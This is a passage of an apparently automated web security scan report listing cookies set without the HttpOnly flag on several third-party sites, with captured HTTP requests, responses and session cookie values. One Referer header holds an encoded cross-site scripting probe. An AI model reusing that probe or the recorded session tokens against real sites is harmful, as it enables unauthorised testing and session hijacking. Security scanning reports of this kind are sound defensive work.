16.22. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4AA45FF46CF90CD8523E63E97BF73AD9; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_2&location=http%3A%2F%2Fwww.livejournal.com%2F&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&iad=1303741261966-50137159274891016&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=C0008DDFCA8D08F38F996B46ADF6D0E1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AA45FF46CF90CD8523E63E97BF73AD9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Mon, 25 Apr 2011 14:20:50 GMT
Connection: close

16.23. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=d8308cb242bf2b615f7a;path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.24. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=3e307db0b53d142e16b3;path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.25. http://partner-support.wiki.zoho.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://partner-support.wiki.zoho.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=786F43CF2EEC7C59F1192542DC2667C0; Path=/
zwcsrfcki=a464e14f-4662-4feb-a6bd-971a8b0a1575; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: partner-support.wiki.zoho.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/me_partners.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zwcsrfcki=a464e14f-4662-4feb-a6bd-971a8b0a1575; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=786F43CF2EEC7C59F1192542DC2667C0; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache-Coyote/1.1
Content-Length: 4700

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<title>Sign in</title>
<style>

BODY {
   background-color: #FFFFFF;
   margin:
...[SNIP]...

16.26. http://partners.criticalwatch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://partners.criticalwatch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e3e36a1656899ba1b39a906867342f35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303736523%22%3B%7Dbb0b132cbb659931fd437f541f9e27c3; expires=Mon, 25-Apr-2011 17:02:03 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: partners.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:02:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e3e36a1656899ba1b39a906867342f35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303736523%22%3B%7Dbb0b132cbb659931fd437f541f9e27c3; expires=Mon, 25-Apr-2011 17:02:03 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html; ch
...[SNIP]...

16.27. http://shopping.netsuite.com/app/site/hit/tracker.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/app/site/hit/tracker.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; path=/
NLShopperId=rcHW8415AciYvvMS; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:25:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/hit/tracker.nl?c=438708&n=1&type=store&sc=3&category=-103&it=&itemid=&referer=http%3A//burp/show/19 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.1.10.1303741547; mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:37 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: -2027806046:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; path=/
Set-Cookie: NLShopperId=rcHW8415AciYvvMS; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:25:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8

16.28. http://shopping.netsuite.com/app/site/query/additemtocart.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.29. http://shopping.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=k5YGN1PLTZzmR0nzLGhnzQDvz2fmnVmwP08wLTCLgBcwkdN2QGGlyJx1nF2fmWcBRhvGwTDryHVlyqhcZ9X4CPL6BCjGyp8jLpRXjhGgycX124RYS3rJvDj8xCfCGnvC!-2139436563; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82&bgon=6f7a8e&bgoff=878fa2&bgbar=878fa2&tasktitletext=ffffff&crumbtext=ffffff&headertext=ffffff&ontab=ffffff&offtab=ffffff&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=FFFFFF&portletlabel=000000&bgbutton=F2F4F6&bgrequiredfld=ffffff&font=Arial%2CHelvetica%2Csans-serif&size_site_content=10pt&size_site_title=10pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3 HTTP/1.1
Accept: */*
Referer: http://shopping.netsuite.com/s.nl?c=438708&n=1
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: shopping.netsuite.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=NQZkN1GDlyzQCQVYjTjhvD8NGnBvydlJ1XVDfphhhgnnYL1p4BDYQyCRjWnBmn1zPvnlT3tX4RF6Gby13Wtm3KjKDptP6whcYVPYpNyyTMbcjFMnMg5vrGB6pBlvPLWD!-2139436563; NLVisitorId=rcHW8495AS0gDkNQ; NLShopperId=rcHW8495AT0gDvdP; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:11:04 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:04 GMT
Last-Modified: Mon, 25 Apr 2011 15:11:04 GMT
NS_RTIMER_COMPOSITE: 2009151588:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=k5YGN1PLTZzmR0nzLGhnzQDvz2fmnVmwP08wLTCLgBcwkdN2QGGlyJx1nF2fmWcBRhvGwTDryHVlyqhcZ9X4CPL6BCjGyp8jLpRXjhGgycX124RYS3rJvDj8xCfCGnvC!-2139436563; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69366

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

16.30. http://shopping.netsuite.com/s.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=GQy1N1GGvj7DswgGhDMN2ZhvJv4H3X6nxLLhgvh11z7mmH1pQQ4GSVvXYgJ34W5fnv0yBWQG4pfxkG9ZnT7C6lLPHblCH3vLW4lLc2H2czvnsTyvTSZpJyCty72LlGB1!-363664704; path=/
NLVisitorId=rcHW8495AXwkDiG7; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:45 GMT; path=/
NLShopperId=rcHW8495AYwkDsle; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:26:45 GMT; path=/
NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&n=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: shopping.netsuite.com
Pragma: no-cache

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:44 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1584514099:73686F702D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=GQy1N1GGvj7DswgGhDMN2ZhvJv4H3X6nxLLhgvh11z7mmH1pQQ4GSVvXYgJ34W5fnv0yBWQG4pfxkG9ZnT7C6lLPHblCH3vLW4lLc2H2czvnsTyvTSZpJyCty72LlGB1!-363664704; path=/
Set-Cookie: NLVisitorId=rcHW8495AXwkDiG7; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:45 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AYwkDsle; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:26:45 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 101978

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Product Catalog</title>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location
...[SNIP]...

16.31. http://t5.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t5.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSATDSTDS=GNAEFPICCPFPBHIMPOCEICLB; path=/
loop=https%3A%2F%2Fwww%2Emanageengine%2Ecom%2Fnetwork%2Dperformance%2Dmanagement%2Ehtml; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=https%3A//store.manageengine.com/service-desk/index.html&p=https%3A//www.manageengine.com/network-performance-management.html&i=18004 HTTP/1.1
Host: t5.trackalyzer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 12:15:25 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Location: http://t5.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=https%3A%2F%2Fwww%2Emanageengine%2Ecom%2Fnetwork%2Dperformance%2Dmanagement%2Ehtml; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSATDSTDS=GNAEFPICCPFPBHIMPOCEICLB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>

16.32. http://tengrinews.kz/tag/891/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tengrinews.kz
Path:	/tag/891/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.33. http://www.fusionvm.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fusionvm.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQQQASDQQ=NNOLHEFCAHOOGAAPGKOENPGL; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fusionvm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 154
Content-Type: text/html
Location: https://www.fusionvm.com/FusionVM
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQQASDQQ=NNOLHEFCAHOOGAAPGKOENPGL; path=/
Date: Mon, 25 Apr 2011 12:54:47 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.fusionvm.com/FusionVM">here</a>.</body>

16.34. http://www.gartner.com/technology/contact/contact_gartner.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gartner.com
Path:	/technology/contact/contact_gartner.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.35. http://www.iveco-ptc.spb.ru/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.iveco-ptc.spb.ru
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=32638563fd192774612570ede2bad57a; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.36. http://www.netsuite.com/app/site/hit/tracker.nl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.netsuite.com
Path:	/app/site/hit/tracker.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=5mXTN1PVw6dygQkdTVTmXQgT7Cs1LMQ7tWgfgqb1Rp1BX437XsxLy1dTQm6Xd61SYY2ZsXLhQkmy4d23GShKhWWrGHXSJJFCxR51kXMRQWvG7LddhvNGGGnyWDf82cDj!-2139436563; path=/
NLVisitorId=rcHW85B5AVBeOVDe; domain=www.netsuite.com; expires=Sunday, 15-Apr-2012 15:13:57 GMT; path=/
NLShopperId=rcHW85B5AVReOThy; domain=www.netsuite.com; expires=Monday, 02-May-2011 15:13:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/hit/tracker.nl?c=NLCORP&n=1&type=page&siteroot=live_6_23_05&url=portal%2Fpage_not_found.shtml&referer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; mbox=session#1303736347554-914602#1303744312|PC#1303736347554-914602.17#1366814452|check#true#1303742512; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.1.10.1303742452

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: 2009164861:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 15:13:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=5mXTN1PVw6dygQkdTVTmXQgT7Cs1LMQ7tWgfgqb1Rp1BX437XsxLy1dTQm6Xd61SYY2ZsXLhQkmy4d23GShKhWWrGHXSJJFCxR51kXMRQWvG7LddhvNGGGnyWDf82cDj!-2139436563; path=/
Set-Cookie: NLVisitorId=rcHW85B5AVBeOVDe; domain=www.netsuite.com; expires=Sunday, 15-Apr-2012 15:13:57 GMT; path=/
Set-Cookie: NLShopperId=rcHW85B5AVReOThy; domain=www.netsuite.com; expires=Monday, 02-May-2011 15:13:57 GMT; path=/

16.37. http://www.smpone.com/images/captcha.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.smpone.com
Path:	/images/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=b07217b91d15829f50a400a4c700d48f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/captcha.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733901

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b07217b91d15829f50a400a4c700d48f; path=/
Content-Type: image/jpeg
Content-Length: 5320

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

16.38. http://www.tresware.com/images/captcha.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tresware.com
Path:	/images/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2629f9017c7f7d7f31d4a3886871e1e7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/captcha.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
